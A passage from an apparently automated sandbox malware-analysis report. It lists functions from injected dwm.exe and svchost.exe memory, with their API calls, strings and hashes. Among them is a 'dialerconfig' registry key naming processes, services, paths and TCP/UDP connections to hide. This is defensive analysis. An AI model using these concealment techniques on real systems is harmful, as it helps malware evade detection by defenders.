Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 2151B23A7126808BDB14DF15F848B2933B5F340B98FB18125DA8E67788EB35CD41C726

Function 000002BAAE2684F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BAAE268503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002BAAE268598

Strings

f, xrefs: 000002BAAE268516
csm, xrefs: 000002BAAE26857E

Memory Dump Source

Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: ecc4167dbe94ae9efbabca2107a08881a39eb888c4b9e6f9a602dc4e01dc6ccf
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 1A51E4723126408BEF18CF15E468B18B3B5F368B98F758224DA8643788DB34CC89C726

Function 000002BAAED884D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BAAED88503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002BAAED88598

Strings

f, xrefs: 000002BAAED88516
csm, xrefs: 000002BAAED8857E

Memory Dump Source

Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: c48fda967e298243dbab0d24029148cb6e945a7cf09b7d01290e854a90eb0d3a
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 0E31BC7A21168096E714DF15EC48B2937B4F740B88FA58015AE8E27B84DB39C941C72A

Function 000002BAAE2684D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BAAE268503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002BAAE268598

Strings

f, xrefs: 000002BAAE268516
csm, xrefs: 000002BAAE26857E

Memory Dump Source

Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 6cd6259b640fc5b162df8461604404c7a240a2db80030e90e8a5791b303d7b2d
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 4731C2B2311680C6EF18DF15E868719B7B4F758BC8F268214EEDA07744CB38C948C716

Function 000002BAAE2914B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002BAAE2914D5
HeapFree.KERNEL32 ref: 000002BAAE2914E4
GetProcessHeap.KERNEL32 ref: 000002BAAE2914F0
HeapFree.KERNEL32 ref: 000002BAAE2914FF
GetProcessHeap.KERNEL32 ref: 000002BAAE29152A

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction ID: bf99236e75c4f043a7eb8a321830645b37f162a4c2713fcc161d8c812524cf54
Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction Fuzzy Hash: 63118832514B88D2EB60CFA6A81821EB3B0F78DB80F284029EBCA03714DF38C429C711

Function 000002BAAE2926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002BAAE2927D4
StrCpyW.SHLWAPI ref: 000002BAAE2927ED

Strings

\\.\pipe\, xrefs: 000002BAAE2927DF

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 03d129240146993466009b1063a6d88bc38d23e29861afde8792a487a6ca2546
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 7271AF3320478145EF749B69A9683AA77A1F74DB84F642016DDC943B89DF36CD08C762

Function 000002BAAE2924DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002BAAE2925C3
StrCpyW.SHLWAPI ref: 000002BAAE2925DA

Strings

\\.\pipe\, xrefs: 000002BAAE2925CE

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 000bd0997d872203a77d3abbbab492f005345b56831d42c0ba2b01d8664bde51
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 3451A42360478142EE74DE2DA56C36A77A1F789780F256025DACA43F99DB36CC09CB62

Function 000002BAAE2A0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002BAAE2A071B
GetLastError.KERNEL32 ref: 000002BAAE2A073D

Strings

U, xrefs: 000002BAAE2A06C7

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 833f3a8f25a7b952dfcd67abba18a7a3419a93ece4b259e36d0367d1f4345dc1
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 6A41E632714A4085EF20CF25E8687AAB7B0F38CB84F604021EE8D87798DB7CC555CB51

Function 000002BAAE29D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002BAAE29D6F9
LCMapStringW.KERNEL32 ref: 000002BAAE29D781

Strings

LCMapStringEx, xrefs: 000002BAAE29D6DC, 000002BAAE29D6ED

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 08cd0ceb70bd5c3fb25b66c53eabe4406d245a66cfcc7065634ecff14abde7ce
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: E3111736608B8086DB60CB16F89429AB7B4F7CDB90F644126EECD83B59DF38C458CB40

Function 000002BAAE2994A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002BAAE2994E8
RaiseException.KERNEL32 ref: 000002BAAE29952E

Strings

csm, xrefs: 000002BAAE29951B

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 23c186619a09c9ee9d8b9a00c63548b1b55c2ea4d6444c44b85e23c33ed3eed4
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 21111C36218B8082EF618F15E45435A77B5F788BA8F285221DFCD07B68DF39C959CB00

Function 000002BAAE29D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002BAAE29D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002BAAE29D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002BAAE29D681

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 20b27b8d4a518f264fed3dfc9a759883ce15e8bc6d6ebdfce8581b57262c2fdb
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 94F02022310B8082EF149F41F8282983731FB8CB80F686025EAC903B15CF39CCACD722

Function 000002BAAED8CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002BAAED8CBC5

Strings

November, xrefs: 000002BAAED8CBA8, 000002BAAED8CBB2
October, xrefs: 000002BAAED8CBBE

Memory Dump Source

Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: c3d8921cda906c5774e95c25f1aac2569b143f39ba3aa41cc85fa96dd22f5b4c
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: ACE09222300981D2EA059B55F8892F83331EB84744F795022999D06AA2EF38CC86C3A3

Function 000002BAAE29D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002BAAE29D631
TlsSetValue.KERNEL32 ref: 000002BAAE29D648

Strings

FlsSetValue, xrefs: 000002BAAE29D61E

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 431775a00661849778365100a41a7fa4a070d535077f0aa8992765cc744db98f
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: D4E09261300A4091EF144B60FC2C6987332BB8CB80F785026D98907355CF38CC6DC732

Function 000002BAAE26CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002BAAE26CBC5

Strings

October, xrefs: 000002BAAE26CBBE
November, xrefs: 000002BAAE26CBA8, 000002BAAE26CBB2

Memory Dump Source

Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 1880df601616def159baa5e08da451b38c1faf93aca46100d314e0fbb42e8d4f
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 42E092A1300541D2FF04BB55F4692E4B331DBEC740F7D5222A99A06692CF38C88EC362

Function 000002BAAE291D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002BAAE291D9B
HeapAlloc.KERNEL32 ref: 000002BAAE291DAA
GetProcessHeap.KERNEL32 ref: 000002BAAE291E1E
HeapFree.KERNEL32 ref: 000002BAAE291E2C

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: a3c266bbf715f0c1863a318cd641b3470c99e6664913a9611b7137eed8d47a33
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 6F219522604B80C1EF218F6AE41825AF3B0FB8CB94F695120DECC47B14EF79C95AC711

Function 000002BAAE291274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002BAAE29127A
HeapAlloc.KERNEL32 ref: 000002BAAE291289
GetProcessHeap.KERNEL32 ref: 000002BAAE2912A3
HeapAlloc.KERNEL32 ref: 000002BAAE2912B4

Memory Dump Source

Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 4f06373ecf4a49fd8f407356e393813010d0bbc109c8877feda45518e71cf9cb
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 3FE0C971611600C6EB149B66D82835977E1EB8CB51F598024C98907350DF7D84A9CB61

Analysis Process: svchost.exePID: 364, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 0000026A879C1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000026A879C165B
HeapAlloc.KERNEL32 ref: 0000026A879C166A

Part of subcall function 0000026A879C1274: GetProcessHeap.KERNEL32 ref: 0000026A879C127A
Part of subcall function 0000026A879C1274: HeapAlloc.KERNEL32 ref: 0000026A879C1289
Part of subcall function 0000026A879C1274: GetProcessHeap.KERNEL32 ref: 0000026A879C12A3
Part of subcall function 0000026A879C1274: HeapAlloc.KERNEL32 ref: 0000026A879C12B4

RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DA
RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1707
RegCloseKey.ADVAPI32 ref: 0000026A879C1721
RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1741
RegCloseKey.ADVAPI32 ref: 0000026A879C175C
RegOpenKeyExW.ADVAPI32 ref: 0000026A879C177C
RegCloseKey.ADVAPI32 ref: 0000026A879C1797
RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17B7
RegCloseKey.ADVAPI32 ref: 0000026A879C17D2
RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17F2
RegCloseKey.ADVAPI32 ref: 0000026A879C180D
RegOpenKeyExW.ADVAPI32 ref: 0000026A879C182D
RegCloseKey.ADVAPI32 ref: 0000026A879C1848
RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1868
RegCloseKey.ADVAPI32 ref: 0000026A879C1883
RegOpenKeyExW.ADVAPI32 ref: 0000026A879C18A3
RegCloseKey.ADVAPI32 ref: 0000026A879C18BE
RegCloseKey.ADVAPI32 ref: 0000026A879C18C8

Part of subcall function 0000026A879C12C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000026A879C1326
Part of subcall function 0000026A879C12C8: GetProcessHeap.KERNEL32 ref: 0000026A879C1334
Part of subcall function 0000026A879C12C8: HeapAlloc.KERNEL32 ref: 0000026A879C1345
Part of subcall function 0000026A879C12C8: RegEnumValueW.ADVAPI32 ref: 0000026A879C13A1
Part of subcall function 0000026A879C12C8: GetProcessHeap.KERNEL32 ref: 0000026A879C13E9
Part of subcall function 0000026A879C12C8: HeapAlloc.KERNEL32 ref: 0000026A879C13F7
Part of subcall function 0000026A879C12C8: GetProcessHeap.KERNEL32 ref: 0000026A879C141B
Part of subcall function 0000026A879C12C8: HeapFree.KERNEL32 ref: 0000026A879C1429
Part of subcall function 0000026A879C12C8: lstrlenW.KERNEL32 ref: 0000026A879C1432
Part of subcall function 0000026A879C12C8: GetProcessHeap.KERNEL32 ref: 0000026A879C1440
Part of subcall function 0000026A879C12C8: HeapAlloc.KERNEL32 ref: 0000026A879C144E

Strings

pid, xrefs: 0000026A879C173A
tcp_local, xrefs: 0000026A879C1826
startup, xrefs: 0000026A879C16FD
SOFTWARE\dialerconfig, xrefs: 0000026A879C16BA
process_names, xrefs: 0000026A879C1775
service_names, xrefs: 0000026A879C17EB
udp, xrefs: 0000026A879C189C
paths, xrefs: 0000026A879C17B0
tcp_remote, xrefs: 0000026A879C1861

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 139f86e9f2346f244d1dd68c2d1ec8f696824a443f106ae828e44e4b72836a90
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: C7711676210A50D6FB90DF62E89869D3FB4FB88B89F405111DE4D63B28EF3AC444CB05

Function 0000026A879C3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000026A879C347A
PathFindFileNameW.SHLWAPI ref: 0000026A879C3489

Part of subcall function 0000026A879C3930: StrCmpNIW.SHLWAPI ref: 0000026A879C3948

Part of subcall function 0000026A879C3878: GetModuleHandleW.KERNEL32 ref: 0000026A879C3886
Part of subcall function 0000026A879C3878: GetCurrentProcess.KERNEL32 ref: 0000026A879C38B4
Part of subcall function 0000026A879C3878: VirtualProtectEx.KERNEL32 ref: 0000026A879C38D6
Part of subcall function 0000026A879C3878: GetCurrentProcess.KERNEL32 ref: 0000026A879C38F4
Part of subcall function 0000026A879C3878: VirtualProtectEx.KERNEL32 ref: 0000026A879C3915

CreateThread.KERNEL32 ref: 0000026A879C34D7

Part of subcall function 0000026A879C1EB4: GetCurrentThread.KERNEL32 ref: 0000026A879C1EBF

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 88cb58427b91c04fa6504016e21a9484d774a83945d8fb86de941a3f11605e71
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: C5115B7061060182FFE1D725B94E35D7E90A7D8745F4440259A0EAB1E4EF3BC0849E43

Function 0000026A879C1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000026A879C1650: GetProcessHeap.KERNEL32 ref: 0000026A879C165B
Part of subcall function 0000026A879C1650: HeapAlloc.KERNEL32 ref: 0000026A879C166A
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DA
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1707
Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1721
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1741
Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C175C
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C177C
Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1797
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17B7
Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C17D2
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17F2

Sleep.KERNEL32 ref: 0000026A879C1C43
SleepEx.KERNELBASE ref: 0000026A879C1C49

Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C180D
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C182D
Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1848
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1868
Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1883
Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C18A3
Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C18BE
Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C18C8

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 131ff0a4b7b3627bec86245eef0d9013fb3dd59f5e4ba82e029a9078f8b5bc32
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 183130B5280A0191FFD09F36DA4935E37A4ABC4BD0F544021DE0DA76EAFF22C850CB56

Function 0000026A87992908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000026A87992A31

Memory Dump Source

Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 218ec7520d977380068f2feaa711e4e0a9d54bee7078138da19b5574add95528
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 6161023270265187FFA8CF19D49876DB3D1FB48BA4F548025DA29177C5DB3AE892CB02

Non-executed Functions

Function 0000026A879C2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000026A879C2D80
lstrlenW.KERNEL32 ref: 0000026A879C2FBA

Part of subcall function 0000026A879C1A14: OpenProcess.KERNEL32 ref: 0000026A879C1A3A
Part of subcall function 0000026A879C1A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000026A879C1A58
Part of subcall function 0000026A879C1A14: PathFindFileNameW.SHLWAPI ref: 0000026A879C1A67
Part of subcall function 0000026A879C1A14: lstrlenW.KERNEL32 ref: 0000026A879C1A73
Part of subcall function 0000026A879C1A14: StrCpyW.SHLWAPI ref: 0000026A879C1A86
Part of subcall function 0000026A879C1A14: CloseHandle.KERNEL32 ref: 0000026A879C1A94

GetProcAddress.KERNEL32 ref: 0000026A879C2D95

Part of subcall function 0000026A879C1554: StrCmpIW.SHLWAPI ref: 0000026A879C1585

Part of subcall function 0000026A879C3930: StrCmpNIW.SHLWAPI ref: 0000026A879C3948

StrCmpNIW.SHLWAPI ref: 0000026A879C2DD8
lstrlenW.KERNEL32 ref: 0000026A879C2F00

Strings

ntdll.dll, xrefs: 0000026A879C2D79
NtQueryObject, xrefs: 0000026A879C2D8B
\Device\Nsi, xrefs: 0000026A879C2DCB

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 6cffb3e72637f80e0ecca6e5675cb6c27de45b81606dbc8799dcaebf2915ee0d
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 87B17A72210A9482EFA9DF29C4487AD77A8FB84B84F545016EE0D63794EF36C980CB42

Function 0000026A879C7E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000026A879C7E8C
RtlCaptureContext.NTDLL ref: 0000026A879C7EB9
RtlLookupFunctionEntry.NTDLL ref: 0000026A879C7ED3
RtlVirtualUnwind.NTDLL ref: 0000026A879C7F14
IsDebuggerPresent.KERNEL32 ref: 0000026A879C7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026A879C7F89
UnhandledExceptionFilter.KERNEL32 ref: 0000026A879C7F94

Memory Dump Source

